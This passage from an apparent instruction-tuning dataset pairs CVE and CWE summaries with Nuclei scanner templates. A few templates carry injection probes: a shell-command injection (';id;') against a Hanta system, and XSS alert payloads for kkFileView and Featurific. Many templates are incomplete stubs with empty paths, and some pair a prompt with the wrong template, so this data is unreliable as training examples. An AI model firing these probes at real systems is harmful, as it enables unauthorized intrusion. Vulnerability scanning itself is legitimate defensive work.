Products: newstatpress_project newstatpress\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-4063\n\ninfo:\n name: NewStatPress <0.9.9 - Cross-Site Scripting\n author: r3Y3r53\n severity: low\n description: WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "low", "id": "CVE-2015-4063"} {"instruction": "Generate a Nuclei template for CVE-2023-26843", "input": "Title: Cross-Site Scripting (XSS) in churchcrm churchcrm\nSummary: A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: churchcrm churchcrm\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-26843\n\ninfo:\n name: ChurchCRM 4.5.3 - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-26843"} {"instruction": "Generate a Nuclei template for: Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF", "input": "Title: Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF\nSummary: Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF. Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an \nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: targa-camera-ssrf\n\ninfo:\n name: Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF\n author: gy741\n severity: high\n description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application.\n tags: targa,ssrf,oast,iot,camera,selea,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol", "category": "generic", "severity": "high", "id": "targa-camera-ssrf"} {"instruction": "Generate a Nuclei template for: vsFTPd Service - Detect", "input": "Title: vsFTPd Service - Detect\nSummary: vsFTPd Service - Detect. vsFTPd FTP service was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: vsftpd-detect\n\ninfo:\n name: vsFTPd Service - Detect\n author: pussycat0x\n severity: info\n description: vsFTPd FTP service was detected.\n tags: network,ftp,vsftpd,detect,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "vsftpd-detect"} {"instruction": "Generate a Nuclei template for CVE-2022-40879", "input": "Title: Cross-Site Scripting (XSS) in keking kkfileview\nSummary: kkFileView v4.1.0 is vulnerable to Cross Site Scripting (XSS) via the parameter 'errorMsg.'\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: keking kkfileview\nIndicators: error", "output": "id: CVE-2022-40879\n\ninfo:\n name: kkFileView 4.1.0 - Cross-Site Scripting\n author: arafatansari,co5mos\n severity: medium\n description: kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2022,kkFileView,xss,keking,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ==\" \n matchers:\n - type: word\n words:\n - \"<img src=1 onerror=alert(document.domain)>=PQ</p>\" \n - \"\u8be5\u6587\u4ef6\u4e0d\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-40879"} {"instruction": "Generate a Nuclei template for: Dangling DNS Records Check", "input": "Title: Dangling DNS Records Check\nSummary: Dangling DNS Records Check. Ensure that dangling DNS records are removed from your public Cloud DNS zones in order to maintain the integrity and authenticity of your domains/subdomains and to protect against domain hijacking.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: gcloud-dns-dangling-records\n\ninfo:\n name: Dangling DNS Records Check\n author: princechaddha\n severity: high\n description: Ensure that dangling DNS records are removed from your public Cloud DNS zones in order to maintain the integrity and authenticity of your domains/subdomains and to protect against domain hijacking.\n tags: cloud,devops,gcp,gcloud,dns,gcp-cloud-config,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "gcloud-dns-dangling-records"} {"instruction": "Generate a Nuclei template for: Hanta Internet Behavior Management System - Remote Code Execution", "input": "Title: Hanta Internet Behavior Management System - Remote Code Execution\nSummary: Hanta Internet Behavior Management System - Remote Code Execution. Hanta Internet Behavior Management System is vulnerable to RCE.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: hanta-rce\n\ninfo:\n name: Hanta Internet Behavior Management System - Remote Code Execution\n author: momika233\n severity: high\n description: Hanta Internet Behavior Management System is vulnerable to RCE.\n tags: hanta,rce,unauth,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dgn/dgn_tools/ping.php?ipdm=2;id;\" \n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "hanta-rce"} {"instruction": "Generate a Nuclei template for CVE-2017-1000486", "input": "Title: Vulnerability (CWE-326) in primetek primefaces\nSummary: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution\nVulnerability Type: Vulnerability (CWE-326)\nSeverity: critical\nAffected Products: primetek primefaces\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-1000486\n\ninfo:\n name: Primetek Primefaces 5.x - Remote Code Execution\n author: Moritz Nentwig\n severity: critical\n description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.\n tags: cve2017,cve,primetek,rce,injection,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Mogwailabs: CHECKCHECK\" \n part: header", "category": "cve", "severity": "critical", "id": "CVE-2017-1000486"} {"instruction": "Generate a Nuclei template for CVE-2023-40504", "input": "Title: OS Command Injection in lg simple_editor\nSummary: LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n. Was ZDI-CAN-19953.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: lg simple_editor\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-40504\n\ninfo:\n name: LG Simple Editor <= v3.21.0 - Command Injection\n author: s4e-io\n severity: critical\n description: LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n tags: cve,cve2023,lg,simple-editor,intrusive,rce,file-upload,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-40504"} {"instruction": "Generate a Nuclei template for CVE-2011-4618", "input": "Title: Cross-Site Scripting (XSS) in simplerealtytheme advanced_text_widget_plugin\nSummary: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: simplerealtytheme advanced_text_widget_plugin\nIndicators: error, vulnerability detected", "output": "id: CVE-2011-4618\n\ninfo:\n name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.\n tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2011-4618"} {"instruction": "Generate a Nuclei template to detect Use of Hard-coded Credentials", "input": "Title: Use of Hard-coded Credentials (CWE-798)\nSummary: The product contains hard-coded credentials, such as a password or cryptographic key. There are two main variations: \n\t\t Inbound: the product contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials. In this variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cann\nVulnerability Type: Use of Hard-coded Credentials\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: dell-idrac9-default-login\n\ninfo:\n name: DELL iDRAC9 - Default Login\n author: kophjager007,milo2012\n severity: high\n description: DELL iDRAC9 default login credentials was discovered.\n tags: dell,idrac,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n - type: status\n status:\n - 201", "category": "cwe", "severity": "high", "id": "CWE-798"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ixcache-panel\n\ninfo:\n name: iXCache Login Panel - Detect\n author: ffffffff0x\n severity: info\n description: iXCache login panel was detected.\n tags: ixcache,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"<title>iXCache\" \n part: body\n - type: status\n status:\n - 302", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: OS Login Not Enabled for GCP Projects", "input": "Title: OS Login Not Enabled for GCP Projects\nSummary: OS Login Not Enabled for GCP Projects. Ensure that the OS Login feature is enabled at the Google Cloud Platform (GCP) project level in order to provide you with centralized and automated SSH key pair management. OS Login ensures that SSH keys are mapped with Google Cloud IAM users, facilitating centralized management of SSH access.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: gcloud-oslogin-disabled\n\ninfo:\n name: OS Login Not Enabled for GCP Projects\n author: princechaddha\n severity: low\n description: Ensure that the OS Login feature is enabled at the Google Cloud Platform (GCP) project level in order to provide you with centralized and automated SSH key pair management. OS Login ensures that SSH keys are mapped with Google Cloud IAM users, facilitating centralized management of SSH access.\n tags: cloud,devops,gcp,gcloud,compute,security,ssh,oslogin,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "gcloud-oslogin-disabled"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: dell-idrac\n\ninfo:\n name: Dell IDRAC Panel - Detect\n author: kazet\n severity: info\n description: Dell IDRAC panel was detected.\n tags: panel,idrac,dell,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/restgui/start.html\" \n - \"{{BaseURL}}/login.html\" \n matchers:\n - type: word\n words:\n - \"SuperTokens + React\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-27925", "input": "Title: Path Traversal in synacor zimbra_collaboration_suite\nSummary: Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: synacor zimbra_collaboration_suite\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-37042\n\ninfo:\n name: Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution\n author: _0xf4n9x_,For3stCo1d\n severity: critical\n description: Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.\n tags: cve,cve2022,zimbra,rce,unauth,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2022-27925"} {"instruction": "Generate a Nuclei template to detect Missing Authentication for Critical Function", "input": "Title: Missing Authentication for Critical Function (CWE-306)\nSummary: The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.\nVulnerability Type: Missing Authentication for Critical Function\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: hadoop-unauth-rce\n\ninfo:\n name: Apache Hadoop YARN ResourceManager - Remote Code Execution\n author: pdteam,Couskito\n severity: critical\n description: Apache Hadoop YARN ResourceManager is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n tags: vulhub,apache,hadoop,unauth,rce,msf,misconfig,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/ws/v1/cluster/apps/new-application\" \n matchers:\n - type: word\n words:\n - \"\"application-id\"\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-306"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ssh-known-hosts\n\ninfo:\n name: SSH Known Hosts File - Detect\n author: geeknik\n severity: info\n description: SSH known hosts file was detected.\n tags: config,exposure,ssh,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.ssh/known_hosts\" \n - \"{{BaseURL}}/.ssh/known_hosts.old\" \n matchers:\n - type: word\n words:\n - \"ssh-dss\" \n - \"ssh-ed25519\" \n - \"ssh-rsa\" \n - \"ecdsa-sha2-nistp256\" \n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: ELB Delete Protection - Disabled", "input": "Title: ELB Delete Protection - Disabled\nSummary: ELB Delete Protection - Disabled. Ensure that Deletion Protection safety feature is enabled for your Amazon Gateway Load Balancers (GWLBs) in order to protect the load balancers from being accidentally deleted.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: elb-delete-protection-disabled\n\ninfo:\n name: ELB Delete Protection - Disabled\n author: DhiyaneshDK\n severity: medium\n description: Ensure that Deletion Protection safety feature is enabled for your Amazon Gateway Load Balancers (GWLBs) in order to protect the load balancers from being accidentally deleted.\n tags: cloud,devops,aws,amazon,elb,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "elb-delete-protection-disabled"} {"instruction": "Generate a Nuclei template for CVE-2020-8615", "input": "Title: Cross-Site Request Forgery (CSRF) in themeum tutor_lms\nSummary: A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).\nVulnerability Type: Cross-Site Request Forgery (CSRF)\nSeverity: medium\nAffected Products: themeum tutor_lms\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-8615\n\ninfo:\n name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery\n author: r3Y3r53\n severity: medium\n description: A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).\n tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2020-8615"} {"instruction": "Generate a Nuclei template for: Atlassian Confluence workflow", "input": "Title: Atlassian Confluence workflow\nSummary: Atlassian Confluence workflow. Workflow that runs all Confluence related nuclei templates\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: confluence-workflow\n\ninfo:\n name: Atlassian Confluence workflow\n author: philippedelteil\n severity: info\n description: Workflow that runs all Confluence related nuclei templates\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "confluence-workflow"} {"instruction": "Generate a Nuclei template for: Detect SSL Certificate Issuer", "input": "Title: Detect SSL Certificate Issuer\nSummary: Detect SSL Certificate Issuer. Extract the issuer's organization from the target's certificate. Issuers are entities which sign and distribute certificates.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ssl-issuer\n\ninfo:\n name: Detect SSL Certificate Issuer\n author: Lingtren\n severity: info\n description: Extract the issuer's organization from the target's certificate. Issuers are entities which sign and distribute certificates.\n tags: ssl,tls,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "ssl-issuer"} {"instruction": "Generate a Nuclei template to detect Command Injection", "input": "Title: Command Injection (CWE-77)\nSummary: The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attac\nVulnerability Type: Command Injection\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: rusty-joomla\n\ninfo:\n name: Joomla! CMS <=3.4.6 - Remote Code Execution\n author: leovalcante,kiks7\n severity: critical\n description: Joomla! CMS 3.0.0 through the 3.4.6 release contains an unauthenticated PHP object injection that leads to remote code execution.\n tags: joomla,rce,unauth,php,cms,objectinjection,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http://rusty.jooml/;pkwxhxqxmdkkmscotwvh\" \n - \"Failed to decode session object\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-77"} {"instruction": "Generate a Nuclei template for: Loginizer Detection", "input": "Title: Loginizer Detection\nSummary: Loginizer Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-loginizer\n\ninfo:\n name: Loginizer Detection\n author: ricardomaia\n severity: info\n description: Loginizer Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/loginizer/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-loginizer"} {"instruction": "Generate a Nuclei template for CVE-2023-20888", "input": "Title: Deserialization of Untrusted Data in vmware vrealize_network_insight\nSummary: Aria Operations for Networks contains an authenticated deserialization vulnerability.\u00a0A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: high\nAffected Products: vmware vrealize_network_insight\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-20888\n\ninfo:\n name: VMware Aria Operations for Networks - Remote Code Execution\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n tags: cve2023,cve,vmware,aria,rce,authenticated,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: status\n status:\n - 500", "category": "cve", "severity": "high", "id": "CVE-2023-20888"} {"instruction": "Generate a Nuclei template for CVE-2011-5265", "input": "Title: Cross-Site Scripting (XSS) in featurific_for_wordpress_project featurific-for-wordpress\nSummary: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. NOTE: this has been disputed by a third party.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: featurific_for_wordpress_project featurific-for-wordpress\nIndicators: error, vulnerability detected", "output": "id: CVE-2011-5265\n\ninfo:\n name: Featurific For WordPress 1.6.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.\n tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Featurific For Wordpress\" \n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2011-5265"} {"instruction": "Generate a Nuclei template for CVE-2025-6403", "input": "Title: Vulnerability (CWE-74) in fabian school_fees_payment_system\nSummary: A vulnerability was found in code-projects School Fees Payment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /student.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\nVulnerability Type: Vulnerability (CWE-74)\nSeverity: high\nAffected Products: fabian school_fees_payment_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-6403\n\ninfo:\n name: Code-Projects School Fees Payment System 1.0 - SQL Injection\n author: hnd3884\n severity: critical\n description: A vulnerability was found in code-projects School Fees Payment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /student.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\n tags: cve,cve2025,sqli,code_projects,unauth,school_fees_payment_system,time-based\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2025-6403"} {"instruction": "Generate a Nuclei template for: Finger Daemon Detection", "input": "Title: Finger Daemon Detection\nSummary: Finger Daemon Detection. The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: finger-detect\n\ninfo:\n name: Finger Daemon Detection\n author: DhiyaneshDK\n severity: info\n description: The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79.\n tags: network,finger,detect,detection,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "finger-detect"} {"instruction": "Generate a Nuclei template for: Cache Poisoning Detection", "input": "Title: Cache Poisoning Detection\nSummary: Cache Poisoning Detection. This template detects Cache poisoning.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: cache-poisoning\n\ninfo:\n name: Cache Poisoning Detection\n author: melbadry9,xelkomy,akincibor,dogasantos\n severity: low\n description: This template detects Cache poisoning.\n tags: cache,generic,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl", "category": "generic", "severity": "low", "id": "cache-poisoning"} {"instruction": "Generate a Nuclei template for CVE-2018-1335", "input": "Title: Unknown Vulnerability in apache tika\nSummary: From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: apache tika\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-1335\n\ninfo:\n name: Apache Tika < 1.1.8 - Header Command Injection\n author: pikpikcu\n severity: high\n description: Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.\n tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive,vkev,vuln\n\nhttp:\n - method: PUT\n path:\n - \"{{BaseURL}}/meta\" \n matchers:\n - type: word\n words:\n - \"Content-Type: text/csv\" \n part: header\n - type: word\n words:\n - \"org.apache.tika.parser.DefaultParser\" \n - \"org.apache.tika.parser.gdal.GDALParse\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2018-1335"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: zuul-panel\n\ninfo:\n name: Zuul Panel - Detect\n author: Yuzhe-zhang-0\n severity: info\n description: ZUUL panel was detected.\n tags: panel,zuul,cicd,oss,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/tenants\" \n - \"{{BaseURL}}/api/status\" \n matchers:\n - type: word\n words:\n - \"\"name\":\" \n - \"\"projects\":\" \n - \"\"queue\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"zuul_version\"", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2021-24145", "input": "Title: Unrestricted File Upload in webnus modern_events_calendar_lite\nSummary: Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request.\nVulnerability Type: Unrestricted File Upload\nSeverity: high\nAffected Products: webnus modern_events_calendar_lite\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24145\n\ninfo:\n name: WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload\n author: theamanrawat\n severity: high\n description: WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.\n tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{md5(string)}}\" \n part: body_3", "category": "cve", "severity": "high", "id": "CVE-2021-24145"} {"instruction": "Generate a Nuclei template for: Golden FTP Server Pro Service - Detect", "input": "Title: Golden FTP Server Pro Service - Detect\nSummary: Golden FTP Server Pro Service - Detect. Golden FTP Server Pro service was 